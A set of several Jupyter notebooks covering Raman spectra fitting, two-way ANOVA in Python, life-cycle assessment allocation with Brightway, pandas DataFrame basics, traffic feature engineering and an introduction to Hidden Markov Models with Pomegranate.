X_1 = np.array([[np.random.normal, np.random.normal] for i in range(samples//2)])
# Class 2
X_2 = np.array([[np.random.normal, np.random.normal] for i in range(samples//2)])
# Bias
bias = np.array([n.random.normal] for i in range(samples))
X = np.concatenate([X_1, X_2], axis = 0)
X_data = np.add(X, bias)
Y_class_data = np.concatenate([-np.ones(50), np.ones(50)], axis = 0)
data = list(zip(X_data, Y_class_data))
print(X_data)
```
|
github_jupyter
|
```
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from sklearn.linear_model import LinearRegression
from functions import *
%matplotlib inline
```
Per trovare i materiali che compongono i cluster scegliamo di **non eseguire un fit su ogni spettro all'interno di un determinato cluster**, ma **procediamo mediando su tutti gli spettri presenti nei singoli cluster e fittiamo sul risultato della media.**
Importiamo cosi i centroidi dei vari cluster, che vengono restituiti in automatico dall'algoritmo k-means utilizzato per la clusterizzazione.
## Import dei dati
```
#import dei pesi dei cluster
labels=np.loadtxt("../data/processed/CLUSTERING_labels.txt")
# import dei centroidi
data = pd.read_csv("../data/processed/CLUSTERING_data_centres.csv")
data.drop(labels='Unnamed: 0',inplace=True,axis=1)
pure_material_names,pure_materials = import_pure_spectra('../data/raw/Database Raman/BANK_LIST.dat','../data/raw/Database Raman/')
```
## Interpolazione
**Le frequenze di campionamento degli spettri puri sono diverse tra loro e diverse da quelle utilizzate per il campionamento degli spettri sperimentali.** Per poter eseguire un fit dobbiamo per prima cosa interpolare i dati degli spettri puri con quelli degli spettri sperimentali. Dopo l'interpolazione le frequenze degli spettri puri saranno le stesse delle frequenze degli spettri sperimentlai.
```
pure_materials_interpoled=pd.DataFrame(data.wn.copy())
for temp in pure_material_names:
pure_materials_interpoled=pure_materials_interpoled.join(pd.DataFrame(np.interp(data.wn, pure_materials[temp+'_wn'] ,pure_materials[temp+'_I']),columns=[temp]))
```
Dopo aver interpolato i dati normalizziamo gli spettri puri.
```
#Normalizzazione
for i in pure_material_names:
pure_materials_interpoled[i]=pure_materials_interpoled[i]/np.trapz(abs(pure_materials_interpoled[i].dropna()), x=pure_materials_interpoled.wn)
```
## Fit
Per fittare gli spettri puri ai dati ragioniamo in questo modo:
- possiamo vedere lo spettro incognito del centroide $C$ come una combinazione lineare con coefficienti non negativi di tutti gli spettri puri $P_{i}$.
- Nel nostro modello gli spettri puri $P_{i} \in \mathbb{R}^n$ dove $n$ e' la dimesnionalita' del vettore delle intensita' dei vari spettri.
- $C = \sum \alpha_{i}P_{i} + P_{0} $ dove $P_{0}$ e' un parametro costante.
Fortunatamente nell'ultimo aggiornamento di SikitLearn (rilasciato proprio nel periodo in cui abbiamo lavorato al progetto) e' stato introdotto il parametro "positive" in LinearRegression, che permette di considerare solo coefficienti non negativi. Questo è stato fondamentale dato che in ogni caso sarebbe stato necessario implementarlo, altrimenti il FIT utilzzava combinazioni di coeficienti positivi e negativi per utilizzando tutti gli spettri in modo da fittare il rumore.
```
ols=LinearRegression(positive=True) #definisco il regressore
```
Per ogni cluster facciamo quindi una regressione lineare estrapolando i coefficienti e l'intercetta.
```
N_cluster=len(data.columns)-1
coeff=[]
intercept=[]
for i in range(N_cluster):
ols.fit(pure_materials_interpoled[pure_material_names], data[str(i)]) #ottimizziamo il modello (lineare) su i dati di training
coeff.append(ols.coef_)
intercept.append(ols.intercept_)
```
### Plot dei vari centroidi dei cluster e del rispettivo fit
```
fig, axs = plt.subplots(nrows = N_cluster,figsize = (16,38))
for i in enumerate(range(N_cluster)):
axs[i[0]].plot(data.wn,data[str(i[0])])
axs[i[0]].plot(pure_materials_interpoled.wn,intercept[i[0]]+np.sum(pure_materials_interpoled[pure_material_names] * coeff[i[0]] ,axis=1))
axs[i[0]].set_title('Cluster ' + str(i[0]))
axs[i[0]].legend(['centroide','fit'], loc='upper right')
```
## Determinazione dell'abbondanza del materiale
Tenendo conto del numero di spettri presenti in ogni cluster, determiniamo il materiale piu' abbondande nel campione utilizzando i coefficienti dei fit. **Otteniamo così il risultato finale: le abbondanze nel campione**.
```
#elimino il cluster a 0 (se presente) e normalizzare i coefficienti per ogni cluster
for temp in np.unique(labels):
if max(data[str(int(temp))])>1e-10:
coeff[int(temp)]=coeff[int(temp)]/sum(coeff[int(temp)])
else:
print(f'Identificato lo spettro piatto, non utilizzato il cluster {int(temp)}')
coeff[int(temp)]=np.zeros(len(coeff[int(temp)]))
#numero di spettri per cluster in ordine
weights=[np.count_nonzero(labels==i) for i in range(len(data.columns)-1)]
#moltiplico i coeficienti del cluster i-esimo per questo numero
abb_notnormalized=[coeff[i]*weights[i] for i in range(len(data.columns)-1)]
#e infine ho la media pesata dei coeficienti
abb=sum(abb_notnormalized)/(sum(abb_notnormalized).sum())
#Creo un Pandas dataframe con nomi e abbondanze
abb_table=pd.DataFrame({'names':pure_material_names,'abbundances':abb})
#riordino in base alla concenrazione
abb_table.sort_values('abbundances',ascending=False,inplace=True, ignore_index=True)
abb_table[abb_table['abbundances']>0.01]
abb_table.to_csv("../data/processed/abb_table.csv")
```
|
github_jupyter
|
# Teste para Duas Médias - ANOVA (Analysis of Variance)
Análise de variância é a técnica estatística que permite avaliar afirmações sobre as médias de populações. A análise visa, fundamentalmente, verificar se existe uma diferença significativa entre as médias e se os fatores exercem influência em alguma variável dependente, com $k$ populaçõess com médias $\mu_i$ desconhecidas.
Os pressupostos básicos da análise de variância são:
- As amostras são aleatórias e independentes
- As populações têm distribuição normal (o teste é paramétrico)
- As variâncias populacionais são iguais
Na prática, esses pressupostos não precisam ser todos rigorosamente satisfeitos. Os resultados são empiricamente verdadeiros sempre que as populações são aproximadamente normais (isso é, não muito assimétricas) e têm variâncias próximas.
Queremos testar se as $k$ médias são iguais, para isto vamos utilizara tabela **ANOVA - Analysis of Variance**
Variação dos dados:
<br>
$$SQT = \sum_{i=1}^{k}\sum_{j=1}^{n_i} (x_{ij}- \overline x)^2 =
\sum_{i=1}^{k}\sum_{j=1}^{n_i} x_{ij}^2 -
\frac{1}{n}\Big(\sum_{i=1}^{k}\sum_{j=1}^{n_i} x_{ij}\Big)^2 $$
<br><br>
$$SQE = \sum_{i=1}^{k} n_i(\overline x_{i}- \overline x)^2 =
\sum_{i=1}^{k} \frac{1}{n_i}\Big (\sum_{j=1}^{n_i} x_{ij}\Big)^2 -
\frac{1}{n}\Big(\sum_{i=1}^{k}\sum_{j=1}^{n_i} x_{ij}\Big)^2 $$
<br><br>
$$SQR = \sum_{i=1}^{k}\sum_{j=1}^{n_i} x_{ij}^2 -
\sum_{i=1}^{k} \frac{1}{n_i}\Big (\sum_{j=1}^{n_i} x_{ij}\Big)^2$$
<br><br>
Verifica-se que:
$$SQT=SQE+SQR$$
onde:
- SQT: Soma dos Quadrados Total
- SQE: Soma dos Quadrados Explicada
- SQR: Soma dos Quadrados dos Resíduos
<br><br>
<img src="img/anova.png" width="450" />
<br><br>
Dentro das premissas de variáveis aleatórias e independentes, o ideal é que cada uma das variáveis de um modelo explique uma determinadda parte da variável dependente. Com isso, podemos imaginar como o *fit* desejado, veriáveis independentes entre si conforme ilustrado na figura abaixo.
<br><br>
<img src="img/anova_explicada.png" width="350" />
<br><br>
# Exemplo: DataSet de crescimento de dentes com duas terapias diferentes
O DataSet representa o crescimento de dentes em animais submetidos a duas terapias alternativas, onde a resposta é o comprimento dos odontoblastos (células responsáveis pelo crescimento dentário) em 60 porquinhos-da-índia. Cada animal recebeu um dos três níveis de dose de vitamina C (0,5, 1 e 2 mg / dia) por um dos dois métodos de entrega (suco de laranja "OJ" ou ácido ascórbico (uma forma de vitamina C e codificada como "CV").
Uma vantagem importante do ANOVA de duas vias é que ele é mais eficiente em comparação com o one-way. Existem duas fontes de variação designáveis supp e dose em nosso exemplo - e isso ajuda a reduzir a variação de erros, tornando esse design mais eficiente. A ANOVA bidirecional (fatorial) pode ser usada para, por exemplo, comparar as médias das populações que são diferentes de duas maneiras. Também pode ser usado para analisar as respostas médias em um experimento com dois fatores. Ao contrário do One-Way ANOVA, ele nos permite testar o efeito de dois fatores ao mesmo tempo. Pode-se também testar a independência dos fatores, desde que haja mais de uma observação em cada célula. A única restrição é que o número de observações em cada célula deve ser igual (não existe tal restrição no caso de ANOVA unidirecional).
Discutimos modelos lineares mais cedo - e ANOVA é de fato um tipo de modelo linear - a diferença é que ANOVA é onde você tem fatores discretos cujo efeito em um resultado contínuo (variável) você quer entender.
## Importando as bibliotecas
```
import pandas as pd
import statsmodels.api as sm
from statsmodels.formula.api import ols
from statsmodels.stats.anova import anova_lm
from statsmodels.graphics.factorplots import interaction_plot
import matplotlib.pyplot as plt
from scipy import stats
```
## Importando os dados
```
datafile = "../../99 Datasets/ToothGrowth.csv.zip"
data = pd.read_csv(datafile)
data.head()
data.info()
data.describe()
fig = interaction_plot(data.dose, data.supp, data.len,
colors=['red','blue'], markers=['D','^'], ms=10)
```
## Calculando a soma dos quadrados
<br>
<img src="img/SS.png">
<br>
```
# Graus de liberdade
N = len(data.len)
df_a = len(data.supp.unique()) - 1
df_b = len(data.dose.unique()) - 1
df_axb = df_a*df_b
df_w = N - (len(data.supp.unique())*len(data.dose.unique()))
grand_mean = data['len'].mean()
# SS para o fator A
ssq_a = sum([(data[data.supp ==l].len.mean()-grand_mean)**2 for l in data.supp])
# SS para o fator B
ssq_b = sum([(data[data.dose ==l].len.mean()-grand_mean)**2 for l in data.dose])
# SS total
ssq_t = sum((data.len - grand_mean)**2)
## SS do resíduo
vc = data[data.supp == 'VC']
oj = data[data.supp == 'OJ']
vc_dose_means = [vc[vc.dose == d].len.mean() for d in vc.dose]
oj_dose_means = [oj[oj.dose == d].len.mean() for d in oj.dose]
ssq_w = sum((oj.len - oj_dose_means)**2) +sum((vc.len - vc_dose_means)**2)
# SS de AxB (iterativa)
ssq_axb = ssq_t-ssq_a-ssq_b-ssq_w
```
## Média dos Quadrados
```
# MQ da A
ms_a = ssq_a/df_a
# MQ de B
ms_b = ssq_b/df_b
# MQ de AxB
ms_axb = ssq_axb/df_axb
# MQ do resíduo
ms_w = ssq_w/df_w
```
## F-Score
```
# F-Score de A
f_a = ms_a/ms_w
# F-Score de B
f_b = ms_b/ms_w
# F-Score de C
f_axb = ms_axb/ms_w
```
## p-Value
```
# p-Value de A
p_a = stats.f.sf(f_a, df_a, df_w)
# p-Value de B
p_b = stats.f.sf(f_b, df_b, df_w)
# p-Value de C
p_axb = stats.f.sf(f_axb, df_axb, df_w)
```
## Resultados
```
# Colocando os resultados em um DataFrame
results = {'sum_sq':[ssq_a, ssq_b, ssq_axb, ssq_w],
'df':[df_a, df_b, df_axb, df_w],
'F':[f_a, f_b, f_axb, 'NaN'],
'PR(>F)':[p_a, p_b, p_axb, 'NaN']}
columns=['sum_sq', 'df', 'F', 'PR(>F)']
aov_table1 = pd.DataFrame(results, columns=columns,
index=['supp', 'dose',
'supp:dose', 'Residual'])
# Calculando Eta-Squared e Omega-Squared, e imprimindo a tabela
def eta_squared(aov):
aov['eta_sq'] = 'NaN'
aov['eta_sq'] = aov[:-1]['sum_sq']/sum(aov['sum_sq'])
return aov
def omega_squared(aov):
mse = aov['sum_sq'][-1]/aov['df'][-1]
aov['omega_sq'] = 'NaN'
aov['omega_sq'] = (aov[:-1]['sum_sq']-(aov[:-1]['df']*mse))/(sum(aov['sum_sq'])+mse)
return aov
eta_squared(aov_table1)
omega_squared(aov_table1)
print(aov_table1)
```
### Comentários
Os resultados da variável dose tem a maior distância do valor médio (sum_sq) e portanto a maior variância relatica (F-Score). Isto pode ser comprovado pelo Eta-Squared e Omega-Squared (definição abaixo).
### Mais sobre Eta-Squared e Omega-Squared
Outro conjunto de medidas de tamanho de efeito para variáveis independentes categóricas tem uma interpretação mais intuitiva e é mais fácil de avaliar. Eles incluem o Eta Squared, o Parcial Eta Squared e o Omega Squared. Como a estatística R Squared, todos eles têm a interpretação intuitiva da proporção da variância contabilizada.
Eta Squared é calculado da mesma forma que R Squared, e tem a interpretação mais equivalente: da variação total em Y, a proporção que pode ser atribuída a um X específico.
O Eta Squared, no entanto, é usado especificamente em modelos ANOVA. Cada efeito categórico no modelo tem seu próprio Eta Squared, de modo que você obtenha uma medida específica e intuitiva do efeito dessa variável.
A desvantagem do Eta Squared é que é uma medida tendenciosa da variância da população explicada (embora seja exata para a amostra), sempre superestima.
Esse viés fica muito pequeno à medida que o tamanho da amostra aumenta, mas para amostras pequenas, uma medida de tamanho de efeito imparcial é Omega Squared. Omega Squared tem a mesma interpretação básica, mas usa medidas imparciais dos componentes de variância. Por ser uma estimativa imparcial das variâncias populacionais, o Omega Squared é sempre menor que o Eta Squared (ES).
Não há padrões acordados sobre como interpretar um ES. A interpretação é basicamente subjetiva. Melhor abordagem é comparar com outros estudos.
Cohen (1977):
- 0.2 = pequeno
- 0.5 = moderado
- 0.8 = grande
## ANOVA com Statsmodels
```
formula = 'len ~ C(supp) + C(dose) + C(supp):C(dose)'
model = ols(formula, data).fit()
aov_table = anova_lm(model, typ=2)
eta_squared(aov_table)
omega_squared(aov_table)
print(aov_table)
```
## Quantile-Quantile (QQplot)
```
res = model.resid
fig = sm.qqplot(res, line='s')
plt.show()
```
|
github_jupyter
|
# Import development libraries
```
import bw2data as bd
import bw2calc as bc
import bw_processing as bwp
import numpy as np
import matrix_utils as mu
```
# Create new project
```
bd.projects.set_current("Multifunctionality")
```
Our existing implementation allows us to distinguish activities and prodducts, though not everyone does this.
```
db = bd.Database("background")
db.write({
("background", "1"): {
"type": "process",
"name": "1",
"exchanges": [{
"input": ("background", "bio"),
"amount": 1,
"type": "biosphere",
}]
},
("background", "2"): {
"type": "process",
"name": "2",
"exchanges": [{
"input": ("background", "bio"),
"amount": 10,
"type": "biosphere",
}]
},
("background", "bio"): {
"type": "biosphere",
"name": "bio",
"exchanges": [],
},
("background", "3"): {
"type": "process",
"name": "2",
"exchanges": [
{
"input": ("background", "1"),
"amount": 2,
"type": "technosphere",
}, {
"input": ("background", "2"),
"amount": 4,
"type": "technosphere",
}, {
"input": ("background", "4"),
"amount": 1,
"type": "production",
}
]
},
("background", "4"): {
"type": "product",
}
})
method = bd.Method(("something",))
method.write([(("background", "bio"), 1)])
```
# LCA of background system
This database is fine and normal. It work the way we expect.
Here we use the preferred calling convention for Brightway 2.5, with the convenience function `prepare_lca_inputs`.
```
fu, data_objs, _ = bd.prepare_lca_inputs(demand={("background", "4"): 1}, method=("something",))
lca = bc.LCA(fu, data_objs=data_objs)
lca.lci()
lca.lcia()
lca.score
```
# Multifunctional activities
What happens when we have an activity that produces multiple products?
```
db = bd.Database("example mf")
db.write({
# Activity
("example mf", "1"): {
"type": "process",
"name": "mf 1",
"exchanges": [
{
"input": ("example mf", "2"),
"amount": 2,
"type": "production",
}, {
"input": ("example mf", "3"),
"amount": 4,
"type": "production",
},
{
"input": ("background", "1"),
"amount": 2,
"type": "technosphere",
}, {
"input": ("background", "2"),
"amount": 4,
"type": "technosphere",
}
]
},
# Product
("example mf", "2"): {
"type": "good",
"price": 4
},
# Product
("example mf", "3"): {
"type": "good",
"price": 6
}
})
```
We can do an LCA of one of the products, but we will get a warning about a non-square matrix:
```
fu, data_objs, _ = bd.prepare_lca_inputs(demand={("example mf", "1"): 1}, method=("something",))
lca = bc.LCA(fu, data_objs=data_objs)
lca.lci()
```
If we look at the technosphere matrix, we can see our background database (upper left quadrant), and the two production exchanges in the lower right:
```
lca.technosphere_matrix.toarray()
```
# Handling multifunctionality
There are many ways to do this. This notebook is an illustration of how such approaches can be madde easier using the helper libraries [bw_processing](https://github.com/brightway-lca/bw_processing) and [matrix_utils](https://github.com/brightway-lca/matrix_utils), not a statement that one approach is better (or even correct).
We create a new, in-memory "delta" `bw_processing` data package that gives new values for some additional columns in the matrix (the virtual activities generated by allocating each product), as well as updating values in the existing matrix.
```
def economic_allocation(dataset):
assert isinstance(dataset, bd.backends.Activity)
# Split exchanges into functional and non-functional
functions = [exc for exc in dataset.exchanges() if exc.input.get('type') in {'good', 'waste'}]
others = [exc for exc in dataset.exchanges() if exc.input.get('type') not in {'good', 'waste'}]
for exc in functions:
assert exc.input.get("price") is not None
total_value = sum([exc.input['price'] * exc['amount'] for exc in functions])
# Plus one because need to add (missing) production exchanges
n = len(functions) * (len(others) + 1) + 1
data = np.zeros(n)
indices = np.zeros(n, dtype=bwp.INDICES_DTYPE)
flip = np.zeros(n, dtype=bool)
for i, f in enumerate(functions):
allocation_factor = f['amount'] * f.input['price'] / total_value
col = bd.get_id(f.input)
# Add explicit production
data[i * (len(others) + 1)] = f['amount']
indices[i * (len(others) + 1)] = (col, col)
for j, o in enumerate(others):
index = i * (len(others) + 1) + j + 1
data[index] = o['amount'] * allocation_factor
flip[index] = o['type'] in {'technosphere', 'generic consumption'}
indices[index] = (bd.get_id(o.input), col)
# Add implicit production of allocated dataset
data[-1] = 1
indices[-1] = (dataset.id, dataset.id)
# Note: This assumes everything is in technosphere, a real function would also
# patch the biosphere
allocated = bwp.create_datapackage(sum_intra_duplicates=True, sum_inter_duplicates=False)
allocated.add_persistent_vector(
matrix="technosphere_matrix",
indices_array=indices,
flip_array=flip,
data_array=data,
name=f"Allocated version of {dataset}",
)
return allocated
dp = economic_allocation(bd.get_activity(("example mf", "1")))
lca = bc.LCA({bd.get_id(("example mf", "2")): 1}, data_objs=data_objs + [dp])
lca.lci()
```
Note that the last two columns, when summed together, form the unallocated activity (column 4):
```
lca.technosphere_matrix.toarray()
```
To make sure what we have done is clear, we can create the matrix just for the "delta" data package:
```
mu.MappedMatrix(packages=[dp], matrix="technosphere_matrix").matrix.toarray()
```
And we can now do LCAs of both allocated products:
```
lca.lcia()
lca.score
lca = bc.LCA({bd.get_id(("example mf", "3")): 1}, data_objs=data_objs + [dp])
lca.lci()
lca.lcia()
lca.score
```
|
github_jupyter
|
___
<a href='http://www.pieriandata.com'><img src='../Pierian_Data_Logo.png'/></a>
___
<center><em>Copyright Pierian Data</em></center>
<center><em>For more information, visit us at <a href='http://www.pieriandata.com'>www.pieriandata.com</a></em></center>
# DataFrames
DataFrames are the workhorse of pandas and are directly inspired by the R programming language. We can think of a DataFrame as a bunch of Series objects put together to share the same index. Let's use pandas to explore this topic!
```
import pandas as pd
import numpy as np
from numpy.random import randint
columns= ['W', 'X', 'Y', 'Z'] # four columns
index= ['A', 'B', 'C', 'D', 'E'] # five rows
np.random.seed(42)
data = randint(-100,100,(5,4))
data
df = pd.DataFrame(data,index,columns)
df
```
# Selection and Indexing
Let's learn the various methods to grab data from a DataFrame
# COLUMNS
## Grab a single column
```
df['W']
```
## Grab multiple columns
```
# Pass a list of column names
df[['W','Z']]
```
### DataFrame Columns are just Series
```
type(df['W'])
```
### Creating a new column:
```
df['new'] = df['W'] + df['Y']
df
```
## Removing Columns
```
# axis=1 because its a column
df.drop('new',axis=1)
# Not inplace unless reassigned!
df
df = df.drop('new',axis=1)
df
```
## Working with Rows
## Selecting one row by name
```
df.loc['A']
```
## Selecting multiple rows by name
```
df.loc[['A','C']]
```
## Select single row by integer index location
```
df.iloc[0]
```
## Select multiple rows by integer index location
```
df.iloc[0:2]
```
## Remove row by name
```
df.drop('C',axis=0)
# NOT IN PLACE!
df
```
### Selecting subset of rows and columns at same time
```
df.loc[['A','C'],['W','Y']]
```
# Conditional Selection
An important feature of pandas is conditional selection using bracket notation, very similar to numpy:
```
df
df>0
df[df>0]
df['X']>0
df[df['X']>0]
df[df['X']>0]['Y']
df[df['X']>0][['Y','Z']]
```
For two conditions you can use | and & with parenthesis:
```
df[(df['W']>0) & (df['Y'] > 1)]
```
## More Index Details
Let's discuss some more features of indexing, including resetting the index or setting it something else. We'll also talk about index hierarchy!
```
df
# Reset to default 0,1...n index
df.reset_index()
df
newind = 'CA NY WY OR CO'.split()
newind
df['States'] = newind
df
df.set_index('States')
df
df = df.set_index('States')
df
```
## DataFrame Summaries
There are a couple of ways to obtain summary data on DataFrames.<br>
<tt><strong>df.describe()</strong></tt> provides summary statistics on all numerical columns.<br>
<tt><strong>df.info and df.dtypes</strong></tt> displays the data type of all columns.
```
df.describe()
df.dtypes
df.info()
```
# Great Job!
|
github_jupyter
|
```
# general tools
import warnings
import requests
import pickle
import math
import re
# visualization tools
import matplotlib.pyplot as plt
from tqdm.auto import tqdm
import seaborn as sns
# data preprocessing tools
import pandas as pd
from shapely.geometry import Point
import numpy as np
from scipy.spatial.distance import cdist
tqdm.pandas()
plt.style.use('seaborn')
warnings.filterwarnings("ignore")
%run ../src/utils.py
traffic = pd.read_csv('../data/external/Traffic_Published_2016.csv')
traffic.shape
traffic.info()
traffic = traffic.dropna(subset=['Lat'])
traffic.shape
train = pd.read_csv('../data/raw/data_train.zip', index_col='Unnamed: 0', low_memory=True)
test = pd.read_csv('../data/raw/data_test.zip', index_col='Unnamed: 0', low_memory=True)
train.shape, test.shape
data = pd.concat([train, test], axis=0)
data.shape
import pyproj
converter = pyproj.Proj("+proj=merc +lat_ts=0 +lat_0=0 +lon_0=0 +x_0=0 \
+y_0=0 +ellps=WGS84 +datum=WGS84 +units=m +no_defs")
data['lat_lon_entry'] = [converter(x, y, inverse=True) for x, y in zip(data.x_entry, data.y_entry)]
data['lat_entry'] = data.lat_lon_entry.apply(lambda row: row[0])
data['lon_entry'] = data.lat_lon_entry.apply(lambda row: row[1])
data['lat_lon_exit'] = [converter(x, y, inverse=True) for x, y in zip(data.x_exit, data.y_exit)]
data['lat_exit'] = data.lat_lon_exit.apply(lambda row: row[0])
data['lon_exit'] = data.lat_lon_exit.apply(lambda row: row[1])
data['euclidean_distance'] = euclidean(data.x_entry.values, data.y_entry.values,
data.x_exit.values, data.y_exit.values)
from math import hypot
from scipy.spatial.distance import cdist
from tqdm import tqdm
traffic = traffic.reset_index(drop=True)
coords_traff = list(zip(traffic.Lat.values, traffic.Long.values))
data['idx_traffic'] = np.zeros(data.shape[0])
df_copy = data.copy()
df_copy = df_copy[df_copy.euclidean_distance!=0]
df_copy = df_copy.reset_index(drop=True)
def minimum_distance(data, row_type='entry'):
for idx, (lat, long) in tqdm(enumerate(list(zip(data['lat_'+row_type].values, data['lon_'+row_type].values)))):
minimum_dist = 0
idx_traffic = cdist([(lat, long)], coords_traff).argmin()
data.loc[idx, 'idx_traffic'] = idx_traffic
return data
df_copy = minimum_distance(df_copy, row_type='exit')
df_copy['idx_traffic'] = df_copy.idx_traffic.astype(int)
df_copy.head(4)
traffic_cols = traffic.columns.tolist()
traffic = traffic.reset_index(drop=False)
#traffic.columns = ['idx_traffic']+[traffic_cols]
df_copy['index'] = df_copy.idx_traffic.values
df_final = df_copy.merge(traffic, on='index')
df_final.head(4)
final_columns = list(set(traffic.columns.tolist()) - set(['level_0', 'index']))
final_columns += ['hash', 'trajectory_id']
for col in final_columns:
if col not in ['hash', 'trajectory_id']:
df_final = df_final.rename(index=str, columns={col: col+'_exit'})
df_final.head(4)
final_columns = ['hash', 'trajectory_id'] + [col+'_exit' for col in final_columns if col not in ['hash', 'trajectory_id']]
df_final[final_columns].head(4)
df_final = df_final.drop('COUNTY_NAME_exit', axis=1)
final_columns = list(set(final_columns) - set(['COUNTY_NAME_exit']))
df_final[final_columns].to_hdf('../data/external/traffic_exit_features.hdf', key='exit', mode='w')
```
From this point, we will perform a round of exploration and visualization regarding the newfound external data.
```
traffic_exit = pd.read_hdf('../data/raw/traffic_exit_features.hdf', key='exit', mode='r')
traffic_entry = pd.read_hdf('../data/raw/traffic_entry_features.hdf', key='entry', mode='r')
traffic_entry.shape, traffic_exit.shape
traffic_entry.head(4).T
```
- AADT: Annual Average Daily Traffic (AADT), is the total volume of vehicle traffic. of a roadway for a year divided by 365 days.
- K_FACTOR: is defined as the proportion of annual average daily traffic occurring in an hour. This factor is used for designing and analyzing the flow of traffic on highways.
- ROUTE_ID: Integer value representing each road on Georgia Federative's roads.
```
29.8% red, 74.1% green and 74.9% blue
fig, ax = plt.subplots(2, 1, figsize=(18, 15))
sns.set_style("whitegrid")
sns.distplot(traffic_entry.AADT_entry.dropna().values,
kde=False,
hist_kws={"linewidth": 3,
"alpha": 1,
"color": "coral"},
ax=ax[0])
sns.distplot(traffic_entry.K_FACTOR_entry.dropna().values,
kde=False,
hist_kws={"linewidth": 3,
"alpha": 1,
"color": [(0.298, 0.741, 0.749)]},
ax=ax[1])
ax[0].set_title('Annual Average Daily Traffic Distribution', fontsize=30)
ax[1].set_title('K-Factor: Proportion of annual average daily traffic occurring in an hour',
fontsize=30)
ax[0].set_xlim(0, 150000)
ax[1].set_xlim(0, 25)
ax[0].grid(False)
ax[1].grid(False)
ax[0].tick_params(axis='both', which='major', labelsize=20)
ax[1].tick_params(axis='both', which='major', labelsize=20)
traffic_entry.AADT_entry.hist(bins=100)
traffic_entry.K_FACTOR_entry.hist(bins=100)
sns.countplot(x='ROUTE_ID_entry', data=traffic_entry)
```
|
github_jupyter
|
# Intro to Hidden Markov Models (optional)
---
### Introduction
In this notebook, you'll use the [Pomegranate](http://pomegranate.readthedocs.io/en/latest/index.html) library to build a simple Hidden Markov Model and explore the Pomegranate API.
<div class="alert alert-block alert-info">
**Note:** You are not required to complete this notebook and it will not be submitted with your project, but it is designed to quickly introduce the relevant parts of the Pomegranate library that you will need to complete the part of speech tagger.
</div>
The notebook already contains some code to get you started. You only need to add some new functionality in the areas indicated; you will not need to modify the included code beyond what is requested. Sections that begin with **'IMPLEMENTATION'** in the header indicate that you need to fill in code in the block that follows. Instructions will be provided for each section, and the specifics of the implementation are marked in the code block with a 'TODO' statement. Please be sure to read the instructions carefully!
<div class="alert alert-block alert-info">
**Note:** Code and Markdown cells can be executed using the `Shift + Enter` keyboard shortcut. Markdown cells can be edited by double-clicking the cell to enter edit mode.
</div>
<hr>
<div class="alert alert-block alert-warning">
**Note:** Make sure you have selected a **Python 3** kernel in Workspaces or the hmm-tagger conda environment if you are running the Jupyter server on your own machine.
</div>
```
# Jupyter "magic methods" -- only need to be run once per kernel restart
%load_ext autoreload
%aimport helpers
%autoreload 1
# import python modules -- this cell needs to be run again if you make changes to any of the files
import matplotlib.pyplot as plt
import numpy as np
from helpers import show_model
from pomegranate import State, HiddenMarkovModel, DiscreteDistribution
```
## Build a Simple HMM
---
You will start by building a simple HMM network based on an example from the textbook [Artificial Intelligence: A Modern Approach](http://aima.cs.berkeley.edu/).
> You are the security guard stationed at a secret under-ground installation. Each day, you try to guess whether it’s raining today, but your only access to the outside world occurs each morning when you see the director coming in with, or without, an umbrella.
A simplified diagram of the required network topology is shown below.

### Describing the Network
<div class="alert alert-block alert-warning">
$\lambda = (A, B)$ specifies a Hidden Markov Model in terms of an emission probability distribution $A$ and a state transition probability distribution $B$.
</div>
HMM networks are parameterized by two distributions: the emission probabilties giving the conditional probability of observing evidence values for each hidden state, and the transition probabilities giving the conditional probability of moving between states during the sequence. Additionally, you can specify an initial distribution describing the probability of a sequence starting in each state.
<div class="alert alert-block alert-warning">
At each time $t$, $X_t$ represents the hidden state, and $Y_t$ represents an observation at that time.
</div>
In this problem, $t$ corresponds to each day of the week and the hidden state represent the weather outside (whether it is Rainy or Sunny) and observations record whether the security guard sees the director carrying an umbrella or not.
For example, during some particular week the guard may observe an umbrella ['yes', 'no', 'yes', 'no', 'yes'] on Monday-Friday, while the weather outside is ['Rainy', 'Sunny', 'Sunny', 'Sunny', 'Rainy']. In that case, $t=Wednesday$, $Y_{Wednesday}=yes$, and $X_{Wednesday}=Sunny$. (It might be surprising that the guard would observe an umbrella on a sunny day, but it is possible under this type of model.)
### Initializing an HMM Network with Pomegranate
The Pomegranate library supports [two initialization methods](http://pomegranate.readthedocs.io/en/latest/HiddenMarkovModel.html#initialization). You can either explicitly provide the three distributions, or you can build the network line-by-line. We'll use the line-by-line method for the example network, but you're free to use either method for the part of speech tagger.
```
# create the HMM model
model = HiddenMarkovModel(name="Example Model")
```
### **IMPLEMENTATION**: Add the Hidden States
When the HMM model is specified line-by-line, the object starts as an empty container. The first step is to name each state and attach an emission distribution.
#### Observation Emission Probabilities: $P(Y_t | X_t)$
We need to assume that we have some prior knowledge (possibly from a data set) about the director's behavior to estimate the emission probabilities for each hidden state. In real problems you can often estimate the emission probabilities empirically, which is what we'll do for the part of speech tagger. Our imaginary data will produce the conditional probability table below. (Note that the rows sum to 1.0)
| | $yes$ | $no$ |
| --- | --- | --- |
| $Sunny$ | 0.10 | 0.90 |
| $Rainy$ | 0.80 | 0.20 |
```
# create the HMM model
model = HiddenMarkovModel(name="Example Model")
# emission probability distributions, P(umbrella | weather)
sunny_emissions = DiscreteDistribution({"yes": 0.1, "no": 0.9})
sunny_state = State(sunny_emissions, name="Sunny")
# TODO: create a discrete distribution for the rainy emissions from the probability table
# above & use that distribution to create a state named Rainy
rainy_emissions = DiscreteDistribution({"yes": 0.8, "no": 0.2})
rainy_state = State(rainy_emissions, name="Rainy")
# add the states to the model
model.add_states(sunny_state, rainy_state)
assert rainy_emissions.probability("yes") == 0.8, "The director brings his umbrella with probability 0.8 on rainy days"
print("Looks good so far!")
```
### **IMPLEMENTATION:** Adding Transitions
Once the states are added to the model, we can build up the desired topology of individual state transitions.
#### Initial Probability $P(X_0)$:
We will assume that we don't know anything useful about the likelihood of a sequence starting in either state. If the sequences start each week on Monday and end each week on Friday (so each week is a new sequence), then this assumption means that it's equally likely that the weather on a Monday may be Rainy or Sunny. We can assign equal probability to each starting state by setting $P(X_0=Rainy) = 0.5$ and $P(X_0=Sunny)=0.5$:
| $Sunny$ | $Rainy$ |
| --- | ---
| 0.5 | 0.5 |
#### State transition probabilities $P(X_{t} | X_{t-1})$
Finally, we will assume for this example that we can estimate transition probabilities from something like historical weather data for the area. In real problems you can often use the structure of the problem (like a language grammar) to impose restrictions on the transition probabilities, then re-estimate the parameters with the same training data used to estimate the emission probabilities. Under this assumption, we get the conditional probability table below. (Note that the rows sum to 1.0)
